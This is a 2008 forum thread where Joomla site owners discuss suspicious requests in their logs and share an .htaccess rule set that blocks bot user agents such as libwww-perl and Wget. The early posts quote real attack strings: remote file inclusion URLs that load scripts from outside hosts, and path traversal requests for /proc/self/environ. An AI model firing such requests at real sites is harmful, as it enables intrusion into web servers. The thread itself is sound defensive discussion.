Page 1 of 1

A collection of strange links on my Joomla site

Posted: Mon Aug 11, 2008 12:57 am
by ased
Hi,

I found this in my site and i wounder whats going on , i'm using MyBlog from azrul as front page , when i put these links in the browser they took me to my front page but there are links to other sites !
How they done it ?
How to delet it and avoid it in the future.

Thanks for your help

The links :

mysite.com/index.php?view=page&pagename=http://www.yavuzselimlisesi.com/compone ... age/id.txt???

mysite.com/index.php?view=page&pagename=http://student-x.com/test.txt?

.mysite.com/index.php?autoLoadConfig[333][0][autoType]=include&autoLoadConfig[333][0][loadFile]=http://hortus-alere.dyndns.org/Home/com ... e/test.txt???

mysite.com/index.php?view=page&pagename=http://www.mubune.com/plugins/safehtml/oye.txt??

Re: hack attempt

Posted: Mon Sep 15, 2008 2:15 am
by wildazzjw
I also have this activity in my logs. A google search vaguely shows this as some sort of hack. Maybe for ZenCart? Not sure able to tell if anything was exploited. Does this work on Joomla?

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00

//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 15, 2008 2:31 am
by mandville
it MIGHT do but my guess it was being called using the libwww bot, ban that in your htaccess and it should dramatically clear up these types of attacks

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 10:33 am
by Jane Blonde
how do I ban that, what is exact code

Code: Select all

SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
That's what I found with google but is that it?

Should we ban other stuff too?

J

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 11:12 am
by mandville
thats basically correct , if you search this forum especially sxome of my posts, you will see the htaccess code i use to ban this and other bad bots

Re: A collection of strange links on my Joomla site

Posted: Mon Sep 29, 2008 10:09 pm
by mandville
this is the sort of full htaccess code i meant, adapt to your own use.

Code: Select all

SetEnvIfNoCase User-Agent “^FlashGet” bad_bot
SetEnvIfNoCase User-Agent “^GetRight” bad_bot
SetEnvIfNoCase User-Agent “^GetWeb!” bad_bot
SetEnvIfNoCase User-Agent “^Go!Zilla” bad_bot
SetEnvIfNoCase User-Agent “^httplib” bad_bot
SetEnvIfNoCase User-Agent “^Indy Library” bad_bot
SetEnvIfNoCase User-Agent “^InfoNaviRobot” bad_bot
SetEnvIfNoCase User-Agent “^InterGET” bad_bot
SetEnvIfNoCase User-Agent “^Internet Ninja” bad_bot
SetEnvIfNoCase User-Agent “^LexiBot” bad_bot
SetEnvIfNoCase User-Agent “^libWeb/clsHTTP” bad_bot
SetEnvIfNoCase User-Agent “^libwww” bad_bot
SetEnvIfNoCase User-Agent “^libwww-perl” bad_bot
SetEnvIfNoCase User-Agent “^LinkextractorPro” bad_bot
SetEnvIfNoCase User-Agent “^Mozilla.*NEWT” bad_bot
SetEnvIfNoCase User-Agent “^Octopus” bad_bot
SetEnvIfNoCase User-Agent “^ProWebWalker” bad_bot
SetEnvIfNoCase User-Agent “^SuperBot” bad_bot
SetEnvIfNoCase User-Agent “^WebAuto” bad_bot
SetEnvIfNoCase User-Agent “^Wells Search II” bad_bot
SetEnvIfNoCase User-Agent “^Wget” bad_bot
SetEnvIfNoCase User-Agent “^wget” bad_bot
<Limit GET POST>
order allow,deny
allow from all
deny from env=bad_bot
</Limit> 

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 10:42 am
by Jane Blonde
Wow! Now your talking, that's great Mandivile, I feel a lot safer!

When I searched your posts for .htaccess I mostly got this one!

JB

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 11:08 am
by mandville
NP - make sure mod_rewrite is on.
you will notice that a lot of libwww will start appearing in your logs marked "denied by server" or similar

Re: A collection of strange links on my Joomla site

Posted: Tue Sep 30, 2008 11:39 am
by Jane Blonde

Code: Select all

RewriteEngine On
:)

Re: A collection of strange links on my Joomla site

Posted: Fri Oct 03, 2008 4:41 pm
by mandville
just thought i would check if this code has helped and if not any other issues arised?

Re: A collection of strange links on my Joomla site

Posted: Fri Oct 03, 2008 5:41 pm
by Jane Blonde
I have not had a problem since and am implementing it on other Joomla sites, thanks:)

Re: A collection of strange links on my Joomla site

Posted: Sat Nov 15, 2008 1:20 pm
by guysmiley
Greetings,

Thanks for this list ;)

If modsecurity is already catching it, am I burdening the server unnecessarily by adding these lines to my .htaccess?

IOW, should I add these lines to .htaccess if modsecurity is already nabbing them?

Thanks!